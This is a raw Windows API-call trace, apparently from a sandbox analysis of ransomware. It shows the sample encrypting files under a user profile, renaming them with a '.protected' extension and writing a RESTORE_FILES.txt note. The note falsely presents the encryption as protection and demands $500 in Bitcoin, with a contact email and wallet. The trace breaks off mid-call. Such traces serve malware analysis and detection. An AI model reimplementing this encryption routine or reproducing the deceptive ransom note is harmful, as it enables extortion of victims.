[0093.492] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0093.492] CloseHandle (hObject=0xd8) returned 1 [0093.492] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.492] lstrcmpiW (lpString1="Feeds", lpString2="Windows") returned -1 [0093.492] lstrcmpiW (lpString1="Feeds", lpString2="Program Files") returned -1 [0093.492] lstrcmpiW (lpString1="Feeds", lpString2="Program Files (x86)") returned -1 [0093.492] lstrcmpiW (lpString1="Feeds", lpString2="$Recycle.bin") returned 1 [0093.492] lstrcmpiW (lpString1="Feeds", lpString2="System Volume Information") returned -1 [0093.492] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds") returned 50 [0093.492] lstrcmpW (lpString1="Feeds", lpString2=".") returned 1 [0093.492] lstrcmpW (lpString1="Feeds", lpString2="..") returned 1 [0093.492] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\*") returned 52 [0093.492] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.509] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.509] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.509] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.509] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.509] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.509] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\.") returned 52 [0093.509] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.509] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.509] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.509] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.509] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.509] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.509] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.509] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\..") returned 53 [0093.509] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.509] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.509] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.509] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="Windows") returned -1 [0093.509] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="Program Files") returned -1 [0093.509] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="Program Files (x86)") returned -1 [0093.509] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="$Recycle.bin") returned 1 [0093.509] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="System Volume Information") returned -1 [0093.509] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms") returned 72 [0093.509] StrStrIW (lpFirst="FeedsStore.feedsdb-ms", lpSrch=".protected") returned 0x0 [0093.509] lstrcmpW (lpString1="FeedsStore.feedsdb-ms", lpString2="RESTORE_FILES.txt") returned -1 [0093.510] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.510] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.510] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.510] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms") returned 72 [0093.510] StrStrW (lpFirst="FeedsStore.feedsdb-ms", lpSrch=".txt") returned 0x0 [0093.510] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms") returned 72 [0093.510] StrStrW (lpFirst="FeedsStore.feedsdb-ms", lpSrch=".rar") returned 0x0 [0093.510] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms") returned 72 [0093.510] StrStrW (lpFirst="FeedsStore.feedsdb-ms", lpSrch=".zip") returned 0x0 [0093.510] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x1a00, lpOverlapped=0x0) returned 1 [0093.514] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffe600, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.514] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1a00, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x1a00, lpOverlapped=0x0) returned 1 [0093.514] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.514] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0093.514] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0093.514] CloseHandle (hObject=0x14c) returned 1 [0093.515] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms.protected") returned 82 [0093.515] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms.protected")) returned 1 [0093.515] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.516] lstrcmpiW (lpString1="Microsoft Feeds~", lpString2="Windows") returned -1 [0093.516] lstrcmpiW (lpString1="Microsoft Feeds~", lpString2="Program Files") returned -1 [0093.516] lstrcmpiW (lpString1="Microsoft Feeds~", lpString2="Program Files (x86)") returned -1 [0093.516] lstrcmpiW (lpString1="Microsoft Feeds~", lpString2="$Recycle.bin") returned 1 [0093.516] lstrcmpiW (lpString1="Microsoft Feeds~", lpString2="System Volume Information") returned -1 [0093.516] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~") returned 67 [0093.516] lstrcmpW (lpString1="Microsoft Feeds~", lpString2=".") returned 1 [0093.516] lstrcmpW (lpString1="Microsoft Feeds~", lpString2="..") returned 1 [0093.516] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\*") returned 69 [0093.516] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.522] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.522] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.522] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.522] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.522] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.522] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\.") returned 69 [0093.522] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.522] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.522] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.522] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.522] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.522] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.522] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.522] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\..") returned 70 [0093.522] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.522] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.522] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.522] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2="Windows") returned -1 [0093.522] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2="Program Files") returned -1 [0093.522] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2="Program Files (x86)") returned -1 [0093.522] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2="$Recycle.bin") returned 1 [0093.522] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2="System Volume Information") returned -1 [0093.522] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms") returned 94 [0093.523] StrStrIW (lpFirst="Microsoft at Home~.feed-ms", lpSrch=".protected") returned 0x0 [0093.523] lstrcmpW (lpString1="Microsoft at Home~.feed-ms", lpString2="RESTORE_FILES.txt") returned -1 [0093.523] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.523] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.523] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0093.524] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms") returned 94 [0093.524] StrStrW (lpFirst="Microsoft at Home~.feed-ms", lpSrch=".txt") returned 0x0 [0093.524] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms") returned 94 [0093.524] StrStrW (lpFirst="Microsoft at Home~.feed-ms", lpSrch=".rar") returned 0x0 [0093.524] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms") returned 94 [0093.524] StrStrW (lpFirst="Microsoft at Home~.feed-ms", lpSrch=".zip") returned 0x0 [0093.525] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0093.547] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.547] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0093.547] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.547] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0093.548] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0093.548] CloseHandle (hObject=0x150) returned 1 [0093.548] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms.protected") returned 104 [0093.548] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms.protected")) returned 1 [0093.549] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.549] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2="Windows") returned -1 [0093.549] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2="Program Files") returned -1 [0093.549] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2="Program Files (x86)") returned -1 [0093.549] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2="$Recycle.bin") returned 1 [0093.549] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2="System Volume Information") returned -1 [0093.549] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms") returned 94 [0093.549] StrStrIW (lpFirst="Microsoft at Work~.feed-ms", lpSrch=".protected") returned 0x0 [0093.549] lstrcmpW (lpString1="Microsoft at Work~.feed-ms", lpString2="RESTORE_FILES.txt") returned -1 [0093.549] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.549] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.549] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0093.549] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms") returned 94 [0093.549] StrStrW (lpFirst="Microsoft at Work~.feed-ms", lpSrch=".txt") returned 0x0 [0093.549] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms") returned 94 [0093.549] StrStrW (lpFirst="Microsoft at Work~.feed-ms", lpSrch=".rar") returned 0x0 [0093.549] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms") returned 94 [0093.549] StrStrW (lpFirst="Microsoft at Work~.feed-ms", lpSrch=".zip") returned 0x0 [0093.550] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0093.557] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.557] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0093.557] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.557] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0093.558] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0093.558] CloseHandle (hObject=0x150) returned 1 [0093.558] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms.protected") returned 104 [0093.558] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms.protected")) returned 1 [0093.558] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.558] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2="Windows") returned -1 [0093.559] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2="Program Files") returned -1 [0093.559] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2="Program Files (x86)") returned -1 [0093.559] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2="$Recycle.bin") returned 1 [0093.559] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2="System Volume Information") returned -1 [0093.559] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms") returned 87 [0093.559] StrStrIW (lpFirst="MSNBC News~.feed-ms", lpSrch=".protected") returned 0x0 [0093.559] lstrcmpW (lpString1="MSNBC News~.feed-ms", lpString2="RESTORE_FILES.txt") returned -1 [0093.559] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.559] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.559] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0093.559] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms") returned 87 [0093.559] StrStrW (lpFirst="MSNBC News~.feed-ms", lpSrch=".txt") returned 0x0 [0093.559] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms") returned 87 [0093.559] StrStrW (lpFirst="MSNBC News~.feed-ms", lpSrch=".rar") returned 0x0 [0093.559] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms") returned 87 [0093.559] StrStrW (lpFirst="MSNBC News~.feed-ms", lpSrch=".zip") returned 0x0 [0093.560] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0093.572] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.572] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0093.572] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.572] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0093.572] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0093.572] CloseHandle (hObject=0x150) returned 1 [0093.572] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms.protected") returned 97 [0093.572] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms.protected")) returned 1 [0093.573] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.573] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.573] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\RESTORE_FILES.txt") returned 85 [0093.573] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.574] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0093.574] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 